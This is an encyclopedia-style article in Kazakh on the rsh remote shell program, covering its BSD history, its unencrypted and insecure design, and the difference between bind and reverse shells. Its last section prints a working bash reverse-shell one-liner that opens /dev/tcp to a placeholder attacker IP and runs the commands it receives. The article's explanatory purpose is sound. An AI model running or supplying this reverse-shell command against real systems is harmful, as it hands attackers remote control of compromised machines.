Кіріспе

Командалық жол бағдарламасы

Қашықтан shell (rsh) – компьютер желісі арқылы басқа пайдаланушы ретінде және басқа компьютерде shell командаларын орындай алатын командалық жол компьютерлік бағдарламасы. rsh қосылатын қашықтағы жүйе rsh демонының (rshd) жұмыс істеуін қамтамасыз етеді. Демон әдетте кең таралған Трансмиссиялық бақылау протоколының (TCP) 513 портын пайдаланады.

Тарих

Rsh 1983 жылы 4.2BSD нұсқасында rlogin пакетінің бір бөлігі ретінде rcp-мен бірге BSD Unix операциялық жүйесінде пайда болды. Содан бері rsh басқа операциялық жүйелерге көшірілді. rsh командасы PWB/UNIX-те алғаш пайда болған, басқа бір таралған UNIX құралы – шектелген қабықшамен бірдей атауға ие; System V Release 4 нұсқасында шектелген қабықша көбінесе /usr/bin/rsh мекенжайында орналасқан. Басқа Беркли r командалары сияқты, rsh протоколы да пайдаланушыны куәландыруды қамтиды және желілік қолдану үшін қауіпсіз емес, себебі ол желі арқылы шифрланбаған ақпаратты жібереді. Кейбір нұсқалары желі арқылы шифрланбаған парольдерді жіберу арқылы куәландыруды жүзеге асырады. Қазіргі кезде rsh бағдарламасы, тіпті жергілікті желілерде де, Secure Shell (ssh) бағдарламасымен ауыстырылды.

Мысал

rsh пайдалану мысалы ретінде, төмендегі команда хост компьютеріндегі remoteuser пайдаланушысы ретінде mkdir testdir командасын орындайды. мысал.com Unix-тәрізді жүйеде жұмыс істейді:

$ rsh remoteuser host.мысал.com "mkdir testdir"

Команда аяқталғаннан кейін rsh жұмысын тоқтатады. Егер команда көрсетілмесе, rsh rlogin арқылы қашық жүйеге кіреді. Қашық компьютердің желідегі орны Домендік атаулар жүйесі арқылы анықталады.

Байлау қабығы және кері қабығы

Қашықтан шель сессиясын жергілікті құрылғы (бұйрықтарды жібереді) немесе қашықтан құрылғы (бұйрықтарды орындайды) бастауы мүмкін. Бірінші жағдайда қашықтан басқару қабығы "байлау қабығы" деп, екінші жағдайда "кері қабық" деп аталады. Кері қабық, команда орындалатын құрылғы тікелей қолжетімді болмаған кезде қолданылады, мысалы, NAT-тің артында орналасқан және сырттан қолжетімді емес компьютерлерді қашықтан техникалық қызмет көрсету үшін. Кейбір зиянды бағдарламалар шабуылға ұшыраған құрылғыдан шабуылдаушылар басқаратын машиналарға кері қабық жасайды (бұл "кері қабық шабуылы" деп аталады). Төмендегі код кері қабық шабуылының мысалын көрсетеді:

$ exec 5<>/dev/tcp/<attacker IP>/80; cat <&5 | while read line; do $line 2>&5 >&5; done

Бұл команда файл дескрипторы ретінде 80-ші портта шабуылдаушының IP-адресіне TCP сокетін ашады. Содан кейін ол сокеттен жолдарды оқып, оларды орындайды, соның ішінде стандартты шығыс ағыны мен қателік ағынын кері сокетке жібереді. Яғни, ол шабуылдаушыға машинаның қашықтан басқару құралын ұсынады.